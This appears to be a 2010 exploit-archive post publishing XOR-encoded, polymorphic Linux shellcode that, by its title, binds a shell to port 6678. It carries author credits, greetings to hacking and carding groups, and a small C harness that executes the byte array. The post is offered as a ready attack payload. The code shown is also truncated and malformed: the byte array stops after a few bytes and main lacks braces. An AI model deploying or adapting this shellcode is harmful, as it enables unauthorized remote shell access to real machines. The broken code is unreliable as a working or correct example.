Title : bind port to 6678 XOR encoded polymorphic linux shellcode .
Name : 125 bind port to 6678 XOR encoded polymorphic linux shellcode .
Date : Tue Jul 6 01:52:33 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
#include <stdio.h>
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x74\x0e\xff"
int main(void)
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();